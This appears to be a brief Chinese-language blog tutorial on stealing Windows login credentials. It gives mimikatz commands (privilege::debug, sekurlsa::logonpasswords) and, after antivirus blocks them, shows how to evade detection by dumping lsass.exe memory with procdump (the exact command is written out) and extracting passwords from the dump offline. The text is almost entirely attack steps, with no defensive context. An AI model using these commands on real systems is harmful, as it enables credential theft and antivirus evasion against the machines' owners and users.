首先打开mimikatz_trunk2.0
在DOS运行界面中输入privilege::debug提权命令1
我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令
但是出现错误,如下图
网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀.
首先在任务管理器找到lsass.exe,右键创建转储文件
用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
命令:
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
注意点:
使用管理员权限打开DOS窗口
*需将lsass.dmp移到procdump64.exe同目录